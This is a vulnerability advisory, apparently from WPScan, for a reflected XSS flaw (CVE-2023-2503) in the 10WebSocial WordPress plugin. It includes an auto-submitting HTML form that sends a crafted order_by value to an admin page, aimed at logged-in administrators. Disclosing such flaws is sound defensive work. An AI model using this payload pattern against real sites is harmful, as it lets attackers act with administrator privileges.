10WebSocial < 1.2.9 – Reflected XSS | CVE 2023-2503 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameter before outputting it back in a page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=info_ffwd" method="POST">
      <input type="hidden" name="order_by" value='" accesskey=X onclick=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS X

Affects Plugins

wd-facebook-feed

Fixed in 1.2.9

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

07b1caf1-d00b-4075-b71a-0516d5604286

Timeline

Publicly Published

2023-05-11 (about 2 years ago)

Added

2023-05-11 (about 2 years ago)

Last Updated

2023-05-11 (about 2 years ago)

Other

Published

Title

Published

2014-10-02

Title

WordPress Integrator 1.32 - Cross-Site Scripting (XSS)

Published

2026-01-05

Title

Phlox < 2.17.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via `data-caption` HTML Attribute

Published

2025-06-25

Title

Responsive Food and Drink Menu <= 2.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via display_pdf_menus Shortcode

Published

2022-01-14

Title

Themify Portfolio Post < 1.1.7 - Reflected Cross-Site Scripting

Published

2023-10-16

Title

BuddyMeet < 2.3.0 - Contributor+ Stored XSS